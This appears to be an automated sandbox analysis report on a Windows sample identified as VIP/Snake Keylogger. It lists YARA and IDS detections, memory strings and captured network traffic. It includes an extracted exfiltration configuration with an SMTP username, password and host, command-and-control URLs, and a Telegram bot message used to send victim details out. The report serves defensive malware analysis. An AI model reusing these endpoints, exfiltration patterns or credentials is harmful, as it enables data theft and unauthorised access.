Source: http://aborters.duckdns.org:8081 |
URL Reputation: Label: malware |
Source: http://anotherarmy.dns.army:8081 |
URL Reputation: Label: malware |
Source: 0.0.z64BLPL.exe.690000.0.unpack |
Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"} |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 00D3F2D5h |
0_2_00D3F138 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 00D3F2D5h |
0_2_00D3F324 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 00D3FA91h |
0_2_00D3F7EC |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 06693360h |
0_2_06692F48 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 06690D0Dh |
0_2_06690B30 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 06691697h |
0_2_06690B30 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 06692C21h |
0_2_06692970 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669D0C9h |
0_2_0669CE20 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669D979h |
0_2_0669D6D0 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 06693360h |
0_2_06692F37 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669E229h |
0_2_0669DF80 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669EF31h |
0_2_0669EC88 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669F7E1h |
0_2_0669F538 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669D521h |
0_2_0669D278 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 06693360h |
0_2_0669328E |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669DDD1h |
0_2_0669DB28 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669E681h |
0_2_0669E3D8 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
0_2_06690040 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669EAD9h |
0_2_0669E830 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669F389h |
0_2_0669F0E0 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669FC39h |
0_2_0669F990 |
Source: Yara match |
File source: z64BLPL.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: Joe Sandbox View |
IP Address: 149.154.167.220 |
Source: Joe Sandbox View |
IP Address: 188.114.97.3 |
Source: Joe Sandbox View |
IP Address: 188.114.97.3 |
Source: Joe Sandbox View |
IP Address: 193.122.6.168 |
Source: Joe Sandbox View |
ASN Name: TELEGRAMRU |
Source: Joe Sandbox View |
ASN Name: CLOUDFLARENETUS |
Source: Joe Sandbox View |
ASN Name: CNSV-LLCUS |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49750 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49746 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 188.114.97.3:443 |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
DNS traffic detected: DNS query: checkip.dyndns.org |
Source: global traffic |
DNS traffic detected: DNS query: reallyfreegeoip.org |
Source: global traffic |
DNS traffic detected: DNS query: api.telegram.org |
Source: global traffic |
DNS traffic detected: DNS query: mail.electradubai.com |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 15:10:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?L |
Source: z64BLPL.exe |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded |
Source: z64BLPL.exe |
String found in binary or memory: http://aborters.duckdns.org:8081 |
Source: z64BLPL.exe |
String found in binary or memory: http://anotherarmy.dns.army:8081 |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/ |
Source: z64BLPL.exe |
String found in binary or memory: http://checkip.dyndns.org/q |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BA3000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://mail.electradubai.com |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: z64BLPL.exe |
String found in binary or memory: http://varders.kozow.com:8081 |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org |
Source: z64BLPL.exe |
String found in binary or memory: https://api.telegram.org/bot |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text= |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002C06000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=enlB |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002A60000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org |
Source: z64BLPL.exe |
String found in binary or memory: https://reallyfreegeoip.org/xml/ |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A60000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33 |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002A8B000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$ |
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 |
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples |
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 |
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002C06000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/ |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002C01000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/lB |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49732 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49743 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49731 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49731 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49732 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49741 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49752 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49751 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49741 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49743 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49749 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49747 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49751 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49752 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49749 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49747 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: z64BLPL.exe, type: SAMPLE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: z64BLPL.exe, type: SAMPLE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: z64BLPL.exe, type: SAMPLE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00BFC571 |
0_2_00BFC571 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00BF268C |
0_2_00BF268C |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00BF5708 |
0_2_00BF5708 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3A088 |
0_2_00D3A088 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3C146 |
0_2_00D3C146 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D37118 |
0_2_00D37118 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3D2CB |
0_2_00D3D2CB |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D35362 |
0_2_00D35362 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3C468 |
0_2_00D3C468 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3D599 |
0_2_00D3D599 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3C738 |
0_2_00D3C738 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D369A0 |
0_2_00D369A0 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3EAA8 |
0_2_00D3EAA8 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3FC37 |
0_2_00D3FC37 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3CD28 |
0_2_00D3CD28 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3CFF7 |
0_2_00D3CFF7 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3F7EC |
0_2_00D3F7EC |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D339ED |
0_2_00D339ED |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D329EC |
0_2_00D329EC |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3EA9B |
0_2_00D3EA9B |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D33AA1 |
0_2_00D33AA1 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D33E09 |
0_2_00D33E09 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_066996C8 |
0_2_066996C8 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06699DF0 |
0_2_06699DF0 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06692288 |
0_2_06692288 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06690B30 |
0_2_06690B30 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06691BA8 |
0_2_06691BA8 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06692970 |
0_2_06692970 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_066951A8 |
0_2_066951A8 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669CE20 |
0_2_0669CE20 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669CE0F |
0_2_0669CE0F |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669D6C0 |
0_2_0669D6C0 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669D6D0 |
0_2_0669D6D0 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669DF7F |
0_2_0669DF7F |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669DF80 |
0_2_0669DF80 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669EC78 |
0_2_0669EC78 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_066994A8 |
0_2_066994A8 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669EC88 |
0_2_0669EC88 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669F528 |
0_2_0669F528 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06698D20 |
0_2_06698D20 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669F538 |
0_2_0669F538 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06698D11 |
0_2_06698D11 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06699D89 |
0_2_06699D89 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669D278 |
0_2_0669D278 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06692278 |
0_2_06692278 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669DB28 |
0_2_0669DB28 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06690B20 |
0_2_06690B20 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669DB19 |
0_2_0669DB19 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669E3CA |
0_2_0669E3CA |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669E3D8 |
0_2_0669E3D8 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06691B97 |
0_2_06691B97 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06690040 |
0_2_06690040 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669E82F |
0_2_0669E82F |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669E830 |
0_2_0669E830 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06690006 |
0_2_06690006 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669F0E0 |
0_2_0669F0E0 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669F0D1 |
0_2_0669F0D1 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669F982 |
0_2_0669F982 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06695198 |
0_2_06695198 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669F990 |
0_2_0669F990 |
Source: z64BLPL.exe, 00000000.00000002.4120472413.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameclr.dllT vs z64BLPL.exe |
Source: z64BLPL.exe, 00000000.00000002.4119946936.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameUNKNOWN_FILET vs z64BLPL.exe |
Source: z64BLPL.exe, 00000000.00000000.1673826294.00000000006D6000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameRemington.exe4 vs z64BLPL.exe |
Source: z64BLPL.exe |
Binary or memory string: OriginalFilenameRemington.exe4 vs z64BLPL.exe |
Source: z64BLPL.exe, type: SAMPLE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: z64BLPL.exe, type: SAMPLE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: z64BLPL.exe, type: SAMPLE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR |
